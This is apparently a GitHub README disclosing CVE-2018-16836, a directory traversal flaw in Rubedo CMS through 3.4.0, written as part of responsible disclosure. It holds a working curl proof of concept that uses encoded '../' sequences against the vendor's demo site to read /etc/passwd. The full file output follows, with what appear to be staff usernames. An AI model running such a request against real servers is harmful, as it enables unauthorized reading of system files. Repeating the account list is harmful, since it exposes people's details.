Skip to content
Branch: master
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
README.md

README.md

CVE-2018-16836

This page was used as reference for a CVE request. Link to CVE entry:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16836

Vulnerability

Rubedo CMS through 3.4.0 contains a Directory Traversal vulnerability directory traversal in theme component, allowing unauthenticated attackers to read and execute arbitrary files order outside the service root path.

Attack Vector

An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) in parameters to navigate to arbitrary files on the system.

Impact

Code execution + Information Disclosure

Discoverer

Marouene Boubakri

PoC

curl -k 'https://demo.rubedo-project.org/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..//etc/passwd'

Result is /etc/passwd file disclosure

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
systemd-bus-proxy:x:998:996:systemd Bus Proxy:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
didier_fanchon:x:1000:1001::/home/didier_fanchon:/bin/bash
mongod:x:997:994:mongod:/var/lib/mongo:/bin/false
elasticsearch:x:996:993:elasticsearch user:/home/elasticsearch:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
webtales:x:1001:1002::/home/webtales:/bin/bash
rubedo:x:1002:1003::/home/rubedo:/bin/bash
nicolas_trenti:x:1003:1004::/home/nicolas_trenti:/bin/bash
alexandru_dobre:x:1004:1005::/home/alexandru_dobre:/bin/bash
robin_lebert:x:1005:1006::/home/robin_lebert:/bin/bash
robin:x:1006:1007::/home/robin:/bin/bash

Fixes

I contacted Rubdeo CMS developement team to patch the vulnerability and provide support to their affected customers.

You can’t perform that action at this time.